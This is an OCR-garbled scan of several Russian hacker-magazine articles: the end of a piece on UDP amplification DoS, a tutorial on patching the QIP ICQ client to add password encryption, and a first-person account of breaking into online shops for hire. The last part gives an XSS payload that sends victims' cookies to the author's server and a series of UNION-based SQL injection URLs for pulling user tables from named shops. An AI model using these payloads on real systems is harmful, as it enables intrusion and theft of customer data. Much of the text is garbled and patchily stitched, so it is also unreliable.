Ну что, перед нами остался только ІЮР Тгаддіе, кото- 
рый базируется наатакеЗМЕІВР, но используетпакеты 
ІЮР вместо ІСМР. Атакующий посылает специально 
сформированные пакеты ІЮР по адресу широкове- 
щательной рассылки усиливающей сети, обычно на 
порт 7 (есГіо). Каждая система сети, в которой разре- 
шен ответ на эхо-пакеты, возвратит пакеты системе- 
жертве, в результате чего будет сгенерирован боль- 
шой объем трафика. Если в системах усиливающей 
сети запрещены эхо-ответы, то системы будутгенери- 
ровать сообщения ІСМР о недостижимости, и полоса 
пропускания все равно будет захватываться ненуж- 
ным трафиком. 

О Вместо послесловия 

Надеюсь, что в твоей голове все разложилось по по- 
лочкам, а перед глазами — целостная картина про- 
исходящего. О ЭоЗ можно говорить очень много (а о 
ЭЭоЗ еще больше). Это как бесконечный сериал с про- 
должениями и ремэйками, но сейчас ты знаешь, как 
пишутся новые серии. Теперь все, что тебя может заин- 
тересовать, — это игра актеров. Все, что мы рассмот- 
рели, применимо к любым системам, использующим 
стек протоколов ТСР/ІР, и не зависит от особенностей 
реализации протоколов высоких уровней. Если ис- 
пользовать все описанные атаки в комбинации, то им 
сможет противостоять только система, отключенная 
от сети, закопанная на пятиметровую глубину и зали- 
тая сверху бетоном для надежности. На этом проща- 
юсь. Удачи! □С 




>На компакт-диске 
лежат исходные коды 
тестовых консольных 
программ, реализую- 
щихописанные виды 
атак. Программы напи- 
саны на С, используют 
НаѵѵЗоскеі. 



ІВИЖЕ 



>Весь материал 
предоставлен только 
для ознакомления. 
Вся ответственность 
заего использование 
ложится натебя. 



!І№П 

> Когда будешь исполь- 
зовать мои программы 
для обучения, не забудь 
проограничения, 
которые накладывает 
на Наѵѵ Зоскеі второй 
сервис-пак ѴѴІпбоѵѵзХР. 
На других ѴѴІпбоѵѵз- 
платформах проблем 
не будет. 
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Иммунитет к троянам 



МОДИФИКАЦИЯ АЛГОРИТМОВ ШИФРОВАНИЯ В ПРОГРАММАХ 

ВСЕ МЫ ЗНАЕМ, ЧТО ЗАПРЕТНЫЙ ПЛОД СЛАДОК, И, НАВЕРНОЕ, У МНОГИХ ВОЗНИКАЕТ ЖЕЛАНИЕ ПОЛУЧИТЬ ДОСТУП 
К ЧУЖИМ ДАННЫМ, БУДЬ ТО КРАСИВАЯ АСЬКА ИЛИ ПОЧТОВЫЙ ЯЩИК. НО, КАК ПРАВИЛО, ОТ СОКРОВЕННОЙ ИНФОРМА- 
ЦИИ НАС ОГРАЖДАЕТ ПАРОЛЬ. МНОГИЕ ЛЮДИ ДЛЯ ЕГО ХИЩЕНИЯ ИСПОЛЬЗУЮТ ТРОЯНЫ, ЧТО САМО ПО СЕБЕ ПОДЛО. 

В ОБЩЕМ СЛУЧАЕ ТАКИЕ ПРОГРАММЫ ДАЮТ ВОЗМОЖНОСТЬ УЗНАТЬ ПАРОЛЬ. НЕВАЖНО, КАКИМ ОБРАЗОМ, НО КОНЕЧ- 
НЫЙ РЕЗУЛЬТАТ ВСЕГДА ОДИН: ЗАВЕТНЫЙ ПАССВОРД — В ЛАПАХ ХАКЕРА. ТАК ДАВАЙ РАЗ И НАВСЕГДА ПОКОНЧИМ 
С ЭТИМ. СЕГОДНЯ Я РАССКАЖУ ОБ УНИВЕРСАЛЬНОМ МЕТОДЕ ЗАЩИТЫ ОТ ТРОЯНЦЕВ. 




рименѳние этого революционно- 
го метода мы разберем на самом 
популярном альтернативном ІСО- 
клиенте — ОІР. На момент написания статьи 
последней версией является ОІР 2005 ВиіІсІ 
7960. 



ОІР и прочие подобные программы хранят 
пароли от учетных записей (в нашем слу- 
чае это іср-номер) различными способами, 
будь то файл или реестр. Перед сохране- 
нием пароля от учетной записи на винт он 
проходит несколько стадий, где над ним 
осуществляются какие-то надругательс- 
тва. Ведь пассворд нужно сначала зашиф- 
ровать и скрыть от посторонних глаз, а 
потом, наоборот, расшифровать, чтобы от- 
править ключевое слово по сети. В общем 
случае схема шифрования и расшифровки 
выглядиттак: 



[расшифрованный пароль] » [действия программы, 
направленные на шифрование пароля] » [зашифро- 



/086 



С точностью до наоборот выглядит процесс 
расшифровки: 

[зашифрованный пароль] » [действия программы, 
осуществляющиеся при зашифровке] » [расшиф- 
рованный пароль] 

Программы, которые воруют пароли, как 
правило, используют в своей основе набор 
действий по расшифровке ключа. Другими 
словами, их авторы просто рипают алгоритм 
расшифровки и используютвсвоихпрограм- 
мах. Но что будет, если мы переделаем схемы 
таким образом: 

[расшифрованный пароль] » [действия программы] 

рованный пароль, чтобы он зашифровался еще боль- 
ше:) ] » [зашифрованный пароль] 



Процесс расшифровки тоже преображается: 



[зашифрованный пароль] » [наша г 



[действия программы по расшифровке] » [расшиф- 
рованный пароль] 

Проще говоря, мы допишем в уже готовую 
программу еще один виток действий, кото- 
рый скроет наш пароль от всяких нехоро- 
ших людей:). Тогда все трояны мигом пойдут 
лесом. 

Но хватит лить воду на мельницу — пора 
переходить к кодингу. Из инструментов 
нам понадобится ОІІуЭВО ( ИПрУ/оІІѵсІЬа.сІе) 
и РЕТооІз ( НДрѴ/иіпс.ги/ІіІез/пеох/РЕ Тооіз. 
зЬіті). Прежде всего нам надо подготовить 
файл цір. ехе для работы с ним. Опытным 
путем было установлено, что в цір. ехе есть 
проверка контрольной суммы файла, так 
как при изменении в файле значения хоть од- 
ного байта мы будем лицезреть сообщение 
снадписью: «Зоггу, цір. ехе Тііе із соггирііесі.». 
Это в нашем случае недопустимо, так как 
нам придется исправить в программе не 
один идаженедвабайта, мы должныубрать 
эту проверку целостности файла. Делает- 
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> Просмотр пароля с помощью ОІР РаззѵѵогсІ Весоѵегу 




> Вот так будет выглядеть участок кода, дописанный нами 



ся это очень просто. Загружаем ц\р. ехе в 
отладчик, далее — ПКМ > ЗеагсН іог > АН 
геІегепсесІіехІзігіпдз.Там сделаем поискпо 
слову «соггиріесі». В программе есть всего 
одно место, где встречается вызов строки с 
таким словом, и оно находится здесь: 

; Вызов процедуры, проверяющей целостность файла 

ШЮЩШШІіЗД) .(Ш2ВйЯ 



; Если файл девственно чист, то она вернет в АЕТВСІЕ 
0062ВА88 ТЕ5Т АІ_ ш 

0062ВА8С РІІЗНО 
0062ВА8Е МОѴ ЕСХ, дір.0062ВВ4С 
; АЗСІІ «Вабдір.ехеіііе» 

0062ВА93 МОѴ ЕйХ, дір.0062ВВ60 

; АЗСІІ «Зоггу, дір. ехеШеізсоггирІесІ.» 
0062ВА98 МОѴ ЕАХ, ОѴѴОРЮ РТВ йЗ: [667С48] 
0062ВА90 МОѴ ЕАХ, ОѴѴОРЮ РТВ ОЗ: [ЕАХ] 



; Если жеА1_ = 0,товыводимсообщениеотом, что 
; кто-то посигнул на целостность нашего файла, 

; после чегопрограммазавершается 
0062ВА9Е САН дір. 0048761 8 

Нам нужно исправить условный переход 
Л\І2 на безусловный ЛѴІР, и тогда програм- 
ма спокойно продолжит свое выполнение. 
Что ж, встаем на адрес 0062ВА8А, нажима- 
ем пробел и вписываем вместо Л\І2команду 
ЛѴІР, после чего сохраняем изменения вехе- 
файле на винт: ПКМ > Сору То ехесиіаЫе > 
АП МосІіЛсаііопз > Копировать все. 

Давай решим, куда мы будем записывать 
дополнительный код. Я думаю, что вполне 
подойдет конец секции кода, где с адре- 
са 00660Е86 идут нули (там их довольно 
прилично, нам хватит). Но, как правило, у 
секции кода атрибут ѴѴгіІеаЫе не стоит, и 
просто так нам в нее писать никто не даст 
— программа просто упадет. Чтобы такого 
не произошло, грузим цір. ехе в РЕТооІз, 
там выбираем Зесііопз, на секции с именем 
«ССЮЕ» жмем правой кнопкой и выбираем 
«Есііі Зесііоп Неабег», далее напротив поля 
«СИагасіегізіісз» есть кнопочка, жмем еще 
и ставим галочку напротив «ѴѴгііеаЫе», со- 



храняем изменения. Все, наш файл теперь 
готов клюбого рода издевательствам:). Что- 
бы сделать метод более универсальным, я 
принял решение написать сІІІ, которая бы 
экспортировала две функции: «Епсгурі» и 
«Оесгурі». Каждая из функций принимает 
один параметр ІрОаіа. Их действия и пара- 
метры, я думаю, понятны. Назовем библио- 
теку ргоіесі. сІІІ и кинем в папку с ОІР. Далее 
в начале программы мы подгрузим нашу сІІІ 
в адресное пространство процесса цір. ехе, 
определим адреса наших двух функций, и в 
местах, где цір считывает зашифрованный 
пароль из учетной записи, мы будем вызы- 
вать Оесгурі, передавая в параметр ІрЭаІа 
указатель на зашифрованный пароль, а в 
местах, где он будет сохранять пароль, мы 
будем вызывать Епсгурі. Вот схема: 

[расшифрованный пароль] » [действия программы] 
» [ргоіесі Епсгурі] » [зашифрованный пароль] 



Процесс расшифровки: 



[действия программы по расшифровке] » [расшиф- 
рованный пароль] 



Итак, грузим цір. ехе в отладчик и делаем пры- 
жок в область с нулями: 

00660А50 ЛѴІР дір. 00660ЕВ2 



Вначале нам надо вызвать І_оасИ_іЬгагу, но 
адреса этой функции мы не знаем. Чтобы 
его определить, делаем так: ПКМ > ЗеагсН 
[ог>АІІіпіегтосІиІегсаІІз. В этом списке нахо- 
дим любой вызов этой АРІ и смотрим, как он 
происходит: САІ_І_ 00407804. Отлично, точно 
так же мы и сделаем! В І_оасИ_іЬгагу в качест- 
ве параметра надо передать имя сІІІ, давайте 
напишем это имя чуть выше адреса прыжка 
(00660ЕВ2). Я сделал это по адресу: 

00660Е86 АЗСІІ «ргоіесі. СІІІ»,0 

После имени также впишем название на- 
ших функций, они нам понадобятся сов- 
сем скоро: 



00660Е92 АЗСІІ «ЕпсгурКО 

00660Е9А АЗСІІ «ОесгурКО 

По адресу 00660ЕВ2 (куда мы прыгнули с ЕР) 
пишем следующий код: 

; Сохраняем все регистры в стеке, чтобы потом не 
; было проблем с последующим выполнением проги 
00660ЕВ2 РІІЗНАО 

;/ЕІІеІ\Іате= «ргоіесі. сІІІ» Кладем в стек параметр, 

; указатель настроку с именем сІІІ 

00660ЕВ8 САН 00407804 ; І_оасИ_ІЬгагуА 



; Результат сохраняем по адресу 660ЕА2 
; (адрес произвольный) 

шшлшшшшмшилр я шттшш 

Теперь, когда мы подгрузили сІІІ, надо уз- 
нать адреса функций с помощью АРІ 
ОеіРгосАсІсІгезз. Ее адрес — внутри нашего 
процесса. Ты можешь найти его аналогично, 
как и адрес І_оасИ_іЬгагу. Вызывать ее мы бу- 
дем так: САІ_І_ 00401384): 

; Кладем в качестве первого параметра имя функции 
00660ЕС2 РЕІЗН дір.00660Е92 
; В качестве второго — результат, который нам верну- 

в 

; ЬоасіиЬгагу, базовый адрес нашей сІІІ в памяти 
; Узнаем, наконец, адрес функции 



; И сохраняем результат 

00660ЕСО МОѴ ОѴѴОВО РТВ 03: [660ЕА6], ■ 

Аналогичная ситуация и с функцикей Оесгурі: 

00660ЕР2 Р ЩИ д Ір.006 : 60ЕІІ 
00660Е07 РІІЗН ОѴѴОВО РТВ ОЗ: [660ЕА2] 

ООббОЕОО САІ_І_ 00401384; 

00660ЕЕ2 МОѴ ОѴѴОВО РТВ ОЗ: [660ЕАА], В 

На данный момент в памяти цір. ехе находит- 
ся нашасШ. Мы узнали адресафункций — са- 
мое время продолжить выполнение про- 
граммы. Для этого нам надо восстановить 
все регистры командой рораб, выполнить 

/ 087 



ХАКЕР 10 /94/ 06 



^ взлом 









> Вот так должна выглядеть измененная > Преображение пароля после некоторой защиты программы 

область данных после нашего нашествия 



три команды, которые были перезатерты на- 
шим прыжком в область с нулями, и сделать 
прыжок на код, который следуетза командой 

ЗМРдір.00660ЕВ2. 

; Восстанавливаем состояние регистров 
00660ЕЕ7 РОРАР 

ШШІІШІШіІІІІІ 

; Следующие три команды затерлись в результате 
; вставления команды ЗМР 00660ЕВ2 на место 
; оригинальной ЕР. Мы должны их выполнить. 

ІВІМива^і 

; Прыгаем на адрес 00660А56, адрес команды, 

; следующей за прыжком в область нулей 

Теперь сохраняем все изменения в файл цір. 
ехе (как это делать, я описал выше). 

Известно, что зашифрованный пароль хра- 
нится в іпі-файле, в параметре ІЧРазз. Путь до 
іпі-файла определяется следующим образом: 

%0\ г_ОЦЭ I Р %\11зегз\%11 1 N %\Сопіід. і пі 

Специально для наших экспериментов я за- 
регистрировал номер ісц и установил пароль 
РаЗзѴѴѵѵОгЭ. Зашифрованный вариантвыгля- 
диттак: І\ІРазз=ЗНѵѵСіаР8аѴ4=. 

Теперь я хотел бы сделать небольшое отступ- 
ление и поговорить о процедурах Епсгурі и 
Эесгурі. Исходники с комментариями ты мо- 
жешь посмотреть на диске. А здесь я прос- 
то хотел бы сказать, что использую в этих 
функциях алгоритм простой табличной за- 
мены или алгоритм сдвига. Каждый символ 
в результате кодирования или декодирова- 
ния смещается на 7 значений, только при 
зашифровке данных на 7 значений вниз, а 
при расшифровке — вверх. То есть, напри- 
мер, символ «9» становится символом «2», 
а символ «я» становится символом «щ». Это 
простой алгоритм, его реализация на ас- 
семблере занимает не больше 10-ти строчек 



кода, отсюда и размер нашей сІІІ — 1248 байт. 
Ты вправе использовать свой алгоритм, но 
при этом желательно соблюдать два условия: 

1. Длина данных на выходе должна быть равна 
длине данных на входе. Это условие необяза- 
тельное, но, чтобы не заморачиваться с вы- 
делением дополнительной памяти и исправ- 
лением еще большей части кода, лучше это 
условие взять за правило. 

2. Если пароли сохраняются в іпі или строко- 
вым параметром в реестр, то на выходе все 
символы должны быть печатаемыми (то есть 
не должно быть символов, чей код меньше 32). 
В нашем случае это условие является обяза- 
тельным. 

Так, теперь нам надо найти место в коде, где 
программасчитываетил и записывает пароль 
в іпі-файл. Давай зацепимся за строку ІЧРазз, 
то есть за название параметра в Сопіід. іпі. 
Очевидно, что если эта строка где-нибудь вы- 
зывается, то программа хочет или прочитать, 
или сохранить зашифрованный пароль. ПКМ 
> Зеагсіз Тог > АП геіегепсесі іехізігіпдз и делаем 
поиск по слову «ІЧРазз». Мест в коде, где вы- 
зывается эта строка, довольно много, так что 
ставим бряки (выделяем найденную строку и 
нажимаем Р2) на все эти места. Теперь давай 
подумаем, в каких случаях программа будет 
обращаться к данным, которые принадлежат 
параметру ІЧРазз. 

Чтение: 

• При загрузке учетной записи; 

• При измененииучетной записи. 

Запись: 

•Присозданииновойучетнойзаписисгалоч- 
кой «Заѵе РаззѵѵогсІ»; 

• При изменении пароля наномере. 

Вроде ничего не упустил. Хорошо, давай 
проделаем все эти действия и посмотрим, в 
каком месте сработает прерывание, парал- 
лельно записывая, при каких действиях и в 
каких местах оно сработало. Я проделал все 
эти действий многократно и получил воттакой 
результат (в 99 % случаях у тебя результат бу- 
деттаким же): 
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Первое срабатывание 

; «ІЧРазз» — здесь сработало прерывание. 

■ 



00622А21 САІ_І_ ОѴѴОРО РТР 05: [ЕОІ+4] 

; <рір.@ТІпіЕІІе@ѴѴгііе5і:гіпд> — при создании новой 
; учетной записи 



Второе срабатывание 

ШіШІЁбИііёіІМ 

006584Е7 МОѴ ЕСХ, дір.006585А8 ; «ІЧРазз» 

■ 

006584Е5 САІ_І_ ОѴѴОРО РТР 05: [ЕОІ+4] 

; <дір.@ТІпіЕІІе@ѴѴгі1:е5і:ппд> — при смене пароля 

ІИШІ 1 



Т ретье срабатывание 

0062204В РІІЗН т 

0062204С МОѴ ЕОХ, дір.00622568; АЗСІІ «Маіп» 

; «ІЧРазз» — вотздесь сработало прерывание. 

■ 

0062205А С АІШ ѴѴОРІР РТР РЗ: ГЕРЦ 
; <дір.@ТІпіЕІІе@РеасІ5ігіпд> — при загрузке или смене 
ш етной записи 

0062205С МОѴ ЕАХ, ОѴѴОРО РТР 33: [ЕВР-38] 
0062205Е І_ЕА ЕОХ, ОѴѴОРО РТР 33: [ЕВР-34] 



Последнее срабатывание 

00622А75 МОѴ ЕОХ, дір.00622С14; АЗСІІ «Маіп» 

; «ІЧРазз» 

■ 

00622А83 САИШ УОРР РТР ОЗ: [ЕРІ+4] 

; <дір.@ТІпіЕІІе@ѴѴгі1:еЗі:ппд> — после нажатия на 
; кнопку «Подключиться» 

При вызове @ТІпіРіІе@\Л/гііеЗігіпд пароль со- 
храняется в СопРд. іпі, в параметр ІЧРазз, а 
при вызове @ТІпіРіІе@РеасІЗігіпд считывает- 
ся оттуда же. Перед вызовом ѴѴгііеЗігіпд надо 
зашифроватьпароль. Как тыможешьвидеть 
из примеров, приведенныхвыше,такихвызо- 
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> Ликвидируем проверку СВС 



00660Р34 МОѴ ЕЭХ, рір.00622С14; АЗСІІ «Маіп» 
—ИНИІІИіД 

С участком 3 история немного иная: тут у нас идет 
считывание, значит, прыжок в область с нашим кодом 
надо делать после вызова РеасІЗігіпд, то есть на мес- 
те команд, которые идут по адресу 0062205С. Делаем 
прыжок: 



вов у нас три. Во всех участках кода вначале идет команда 
ризН еах. Именно она кладет в стек данные, которые будут 
записаны в іпі, в параметр ІЧРазз. Нам надо зашифровать 
их до вызова ѴѴгііеЗігіпд. Начнем с участка кода под номе- 
ром 1 . Итак, будем делать прыжок в конец секции кода пос- 
ле команды ризб еах, затирая команду, следующую за ней: 

РШ 8ИММ ИІ 

; Прыжок в конец секции кода, в область с нулями 

А по адресу 00660ЕРЗ пишем следующий код: 

; Вначале по адресу 660ЕА6 мы записали адрес функции Епсгурі 
; Теперь пришло время ее вызвать. Напомню, что одним параметром 
; в эту функцию передается указатель на данные для шифрования, 

; но он уже есть в стеке. 

00660ЕРЗ САШОѴѴОВО РТВ 03: [660ЕА6] 

; Наша процедура использует один параметр из стека, значит, 

; после ее выполнения стекувел ичится на4 байта, а нам это не нужно 

МИИ 

; АЗСІІ «ІЧРазз»; Эта команда была переписана нашим прыжком 
; в эту область, но выполнить мы ее все равнообязаны. 

|||І|| II НУ Ни, іи і і и іі 1 1 1 1 і іі | 

; Продолжаем выполнение программы наадрес 00660ЕЕЗ команды. 
С участком кода под номером 2 поступаем аналогично: 
ШШШ ш ШірЫЫШ 

ІІ6584Е7ШШВ|ІР-00660Р(Й 

По адресу 00660Р06 пишем абсолютно аналогичный код: 

00660Е06 САІ_І_ ЭѴѴОВО РТВ ЭЗ: [660ЕА6] 

00660Е0С 511В ЕЗР, 4 

00660Е0Е МОѴ ЕСХ, рір.00622С04 ; АЗСІІ «ІЧРазз» 

ЬфббОРМ Щ] МР С|ір .006584ЕС 

С участком под номером 4 та же история: 

ЩДВДрМііШііШ 

А в адрес 00660Р2В пишем: 

00660Е2В САІ_І_ ОѴѴОВО РТВ ЭЗ: [660ЕА6] 



0062205С ЛѴІР цір.ООббОЕІЭ 

По адресу 00660Р19 — следующий код: 

; Сейчас по адресу [ЕВР-38] находится указатель на данные, 
;которые были считаны из параметра ІЧРазз файла СопЛд. іпі 
00660Р19 МОѴ ЕАХ, ОѴѴОВО РТВ 33: [ЕВР-38] 

; Теперь кладем указатель на данные в еах 
00660Е1С РІІЗНЕАХ 

; и вызываем Оесгурі 

00660ЕЮ САІ_І_ ОѴѴОВО РТВ 03: [660ЕАА] 

; выполняем затертую команду 
00660Е23 І_ЕА ЕОХ, ОѴѴОВО РТВ 33: [ЕВР-34] 

; И продолжаем выполнение программы 

Вот и все. Сохраняем все изменения в файле и создаем 
новую учетную запись. Теперь при любом считывании 
или записи в файл СопТід.іпі данных, они будут перед 
этим проходить через наши процедуры, которые будут 
их дополнительно зашифровывать или расшифровы- 
вать. 

□ Заключение 

РІапоследок хочу отметить, что данная технология яв- 
ляется универсальной. Даже не столько в плане допол- 
нительной защиты паролей, сколько в плане защиты 
сохраняемой информации на диск различными про- 
граммами. Во многих программах алгоритмы шифрова- 
нияихраненияпаролейдовольнопримитивны, ктому же 
если программа довольно знаменита, то эти алгоритмы 
обязательно будут выдернуты из программы. При этом 
софтина может удовлетворять всем вашим требовани- 
ям, однако вХХІ веке информация играетключевую роль 
в нашей жизни, поэтому мы должны защищать ее всеми 
возможными способами. Хочу отметить также, что, на- 
пример, в довольно знаменитом файловом менеджере 
ТоіаІ Соттапбег есть замечательный РТР-клиент, кото- 
рым я пользуюсь. Все настройки учетных записей хра- 
нятсявіпі-файле.Так же, какивОІР'е.алгоритмрасшиф- 
ровки этих паролей давно известен, поэтому домашним 
заданием будет исследовать эту программу самим (это 
не намного сложнее, чем ОІР). Просто найди места в 
коде, где считывается и сохраняется зашифрованный 
пароль, и потом проделай с этими участками кода то же 
самое, что мы выполнили выше. И-И 




> На сайте ГіДрѴ/ѵѵазт. 
ш ты сможешь найти 
множество статей, 
которые расскажут 
о разныхтехниках 
модификации готового 
кода. 

Насайте ГіДр://сгаскІаЬ. 
Ш ты сможешь найти 
все необходимые 
инструменты, которые 
могут понадобиться 
реверс-инженеру. 




>На нашем дискеты 
найдешь все програм- 
мы, которые были 
использованы в данной 
статье, полный листинг 
ргоіесТсІІІ наассембле- 
рес комментариями, а 
также модифицирован- 
ную версию клиентацір 
с результатами наших 
трудов. А еще я снял 
видеоурок, чтобы тебе 
легче было повторить 
мой метод защиты. 



ІШСЕК! 



>Если результат 
дизассемблирования 
или модификации 
готовых программных 
продуктов нанес какой- 
то ущерб автору или 
людям, использовав- 
шим это ПО, то ты мо- 
жешь быть привлечен к 
уголовной ответствен- 
ности в соответствии 
с УК РФ. 
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ХАКЕР 
ПО НАИМУ 



ТЫ КОГДА-НИБУДЬ ЗАДУМЫВАЛСЯ НАД ТЕМ, КАК ПРОФЕССИОНАЛЬНЫЕ ХАКЕРЫ ЗАРАБАТЫВАЮТ СЕБЕ НА ЖИЗНЬ? 

Я ДУМАЮ, НЕ СТОИТ И ГОВОРИТЬ, ЧТО В НЕЛЕГАЛЬНОЙ СРЕДЕ КРУТЯТСЯ ОЧЕНЬ БОЛЬШИЕ ДЕНЬГИ, КОТОРЫЕ ЗАЧАСТУЮ 
ПРЕВЫШАЮТ ГОДОВЫЕ БЮДЖЕТЫ НЕКОТОРЫХ СТРАН МИРА. ТЕБЕ НАВЕРНЯКА НАДОЕЛО ХОДИТЬ В РВАНЫХ ДЖИНСАХ, 
ГРЫЗТЬ СУХАРИКИ И ЗАПИВАТЬ ИХ ВТОРОСОРТНЫМ ПИВОМ, ДА К ТОМУ ЖЕ ВЫСЛУШИВАТЬ ПОСТОЯННЫЕ ЖАЛОБЫ 
ОТ СОБСТВЕННОЙ ДЕВУШКИ О ТОМ, ЧТО ОНА ХОЧЕТ НОВУЮ ЮБКУ И КОЛЬЕ ЗА $ 1 000. ПОВЕРЬ, ВСЕ МОЖНО ИЗМЕНИТЬ 
ПРИ ПОМОЩИ ПРЯМЫХ РУК И СВОИХ МОЗГОВ. И Я ПОКАЖУ ТЕБЕ, КАК ЭТО СДЕЛАТЬ. 

ВЗЛАМЫВАЕМ НА ЗАКАЗ 



днажды ко мне в асю постучался 
человек с предложением о со- 

| | трудничестве. Оказалось, что ему 

нужен был доступ к базам нескольких ин- 
тернет-магазинов в доменной зоне. ш. Об- 
судив детали заказа и сумму моего гонора- 
ра, я согласился. Одним из условий клиента 
было обязательное прохождение теста, ко- 
торый заключался в получении БД с любого 
из двух предоставленных мне ру-шопов в 
течение 4-х суток. Тест полностью оплачи- 
вался заказчиком, и это меня устраивало. 

На следующий день, проверяя мыло, я обна- 
ружил мессагу с веб-адресами интернет-ма- 
газов и напоминанием отом, что время пошло. 
Недолго думая, я запустил Оперу и зашел на 
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первый из двух сайтов — ѵѵѵѵѵѵ.ООЗ.ги. Напол- 
нение ресурса меня мало интересовало, и я 
сразу приступил к осмотру «пациента». Оки- 
нув взглядом индекс сайта, в глаза бросилась 
ссылка на форум, который, увы, был предус- 
мотрительно пропатчен. Все данные в формах 
жестко фильтровались, и меня посылали идти 
лесом. Тогда я вспомнил про функцию поиска 
по сайту и решил попытать счастья там. В мо- 
ей практике уже не раз встречались качест- 
венно написанные движки с бажными поиско- 
виками, поэтому надежда на благоприятный 
исход дела не покидала меня. Я вбил в фор- 
мочку поиска запрос вида: 

<зсгірі>аІегі ('хзз')</зсгірІ> 



Потом нажал Епіег, после чего браузер отоб- 
разил приветливое окошечко аіегі с надписью 
хзз'. Это означало лишь одно: уязвимость 
есть, и ее необходимо использовать. Я взгля- 
нул на адресную строку: 

Ыгр ://ѵѵѵѵѵѵ. 003. ги/Ті п сі/ 1 . ЫтпІ? 

ЛпсІзігіпд=%ЗСзсгірі%ЗЕаІегі%28%27хзз%27%29%- 

С%2Рзсгірі%ЗЕ&рагііііоп= 

Передаваемое значение параметра ТіпсІз1:гіпд 
позволяло мне выполнить произвольный 
Іаѵазсгірі-код: 

ЬДрѴ/ѵѵѵѵѵѵ.ООЗ.ги/ЛпсІ/І. ГіітІ?1 : іпсІзігіпд=мой_іаѵазсгір1:- 
код&раПШоп= 
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Я быстренько накатал небольшой снифер на рітр, залил 
его наодин из своих серверов и сформировал «ядовитый» 
линк для админа: 

НіірУ/ѵѵѵѵѵѵ.ООЗ.ги/ііпб/І . ИітІ?ііпбзігіпд=<5Сгірі>сІосигпепі. 
Іосаііоп=Ъіір://ту_зегѵег.сот/зпіі. ріір?«+сІоситепі. соокіе 
</зсгірі>&рагііііоп= 

Где ту_зегѵег.сот — урл моего сервера, а зпіГрІір — 
рігр-снифер. Затем при помощи функции Ьіп2Гіех () в рітр я 
закодировал линк и отправил его в письме на мыло админу. 
Прошло двое суток, а кукисы не прилетали. Ждать дальше 
было нельзя. Невыполнение заказа у меня оставалось 
ровно два дня. Открыв браузер и набрав в адресной стро- 
ке ѵѵѵѵѵѵ.еізоп.ги . я принялся изучать сайт второго шопа. 
Приметив функцию поиска по сайту, я немедленно прове- 
рил ее на прочность и не прогадал. Поисковик и на этом 
сайте был подвержен хзз: 



ЗОІ_: ЗЕЬЕСТ іоріс.зибіесі, іоріс. безсгірііоп, ОАТЕ_ЕОВМАТ (іоріс. 
іоріс_сІаіе, ' %сІ/%т/%У %Т'), іоріс. До, іоріс. етаіі ЕРОМ еізоп_іогит_ 
іорісАЗіоріс\ШЕВЕіоріс.ісІ=?АМОіоріс.сііескесІ=1 ОВСЮР ВУ іоріс. ісі 

Вот и еще одна зці-іпіесііоп проявила себя. Но в отличие от 
первой инъекции, где данные из ІтітІ-формы передава- 
лись методом розі, во втором случае использовался метод 
ОЕТ, что облегчало составление запросов кбазе. Поэтому 
было решено использовать именно уязвимость в движке 
форума. Первым делом я проверил права для доступа к 
таблице пользователей МуЗОІ_: 

Иіір://еІзоп.ги/сді-Ьіп/іошт_есІііог. рі?еѵепі=ѵіе\лМоріс&іорісЭсІ=-1+и 
піоп+зеіесі+Чігот+туздІ. изег/*&з_іехі= 

На что получил отрицательный ответ: 

ЗЕЬЕСТсоттапсІсІепіесІіоизег: Д18785@10.10.11.41'іогіаЬІе'изеГ 




>На БУБ-дискеты най- 
дешь видео по взлому 
интернет-магазина. 






Ьіір://еІзоп.ги/сді-Ьіп/зеагсГі. рі?зеагсіі_зігіпд=мой_іаѵазсгірі- 
код&тос1е=саіа1од_зеагс1п&х=0&у=0 

Но, учитывая печальный опыт с реализацией хзз на 
ѵѵѵѵѵѵ.ООЗ.ги . я решил отложить баг до худших времен и ос- 
мотреть ресурс подробнее. Каталог товаров отображал- 
ся в обычных біті-страницах, а вот личный кабинет был 
написан на перле. Заинтересовавшись регі-движком, я 
начал «тестировать» его на прочность. Но, проверив 
скрипты регистрации и личного кабинета, я был вынужден 
отступить. Однако через некоторое время обратил внима- 
ние на раздел «рассчитать доставку», в котором предла- 
галось заполнить три формы. После недолгих экспери- 
ментов со значениями полей скрипт ругнулся и выдал 
ошибку: 

Уоиііаѵеапеггогіпуоиг50І_зупіах. Сііескіііетапиаііііаісоггезропсіз 
Іо уоиг Му301_ зегѵег ѵегзіоп іо г іііе гідГіі зупіах іо изе пеаг " АЫ Б ѵѵеідііі_ 
ііІІ>=1' ІітііТаіІіпе 1 

ЗОІ_: ЗЕЬЕСТ ѵѵеідЬЦтот, ѵѵеідЬі_ііІІ ЕРОМ еізоп_срсг_рау_гоѵѵ 
ѴѴНЕВЕѵѵеідГіМгот <Щ' АМБѵѵеідііі_ііІІ>=1' Іітііі 

Оказалось, что скрипт саісиіаіог. рі не фильтровал входя- 
щие данные из поля «Вес товара», благодаря чему суще- 
ствовала возможность проведения зці-инъекции. Этот 
факт несомненно обрадовал меня, но напоследок я захо- 
тел пройтись по форуму магазина. Как ни странно, он тоже 
был написан на регі. Изменив значение параметра ісі в 
іогит_есІііог. рі, я увидел сообщение: 

Уоиііаѵе ап еггогіпуоигЗОІ- зупіах. Сііескіііетапиаііііаісоггезропсіз 
іо уоиг МуЗОІ_ зегѵег ѵегзіоп іог іГіе гідііі зупіах іо изе пеаг 'V АЫ Б іоріс. 
сііескесІ=1 ОВОІІРВУіоріс. ісі'аіііпе 1 



В такой ситуации мне ничего не оставалось делать, как по- 
пробовать подобрать количество полей. Поиграв с багой 
несколько минут, я достиг желаемого результата при по- 
мощи запроса: 

Иіір://еІзоп. ги/сді-Ьіп/Тогит_есІііог. рІ?еѵепі=ѵіе\л/_іоріс&іоріс_ісІ=- 
1+ипіоп+зеІесі+пиІІ, пиіі, пиіі, пиіі, пиІІ/*&з_іехі= 

Далее нужно было получить название таблицы в БД. По- 
сле недолгих раздумий я указал «еІзоп_и5ег5»: 

Гііір://еІзоп.ги/сді-Ьіп/іогит_есІііог. рІ?еѵепі=ѵіеѵѵ_іоріс&іоріс_ісІ=-1-і-и 
піоп+зеІесі+Чігот+еІзоп^зегз/*&з_іехі= 

Ответ МуЗОІ_ не заставил себя ждать: 

ТбеизесІЗЕЕЕСТзіаіетепізііаѵеасШегепіпитЬегоісоІитпз 

Ура! Значит, таблица «еІзоп_изег5» действительно суще- 
ствует. И я догадывался, какая информация находится в 
ней:). Оставалось только извлечь данные юзеров. Но для 
этого мне нужно было знать названия полей в таблице. 
Я не стал себя сильно утруждать и ввел «етаіі», сам за- 
прос выглядел так: 

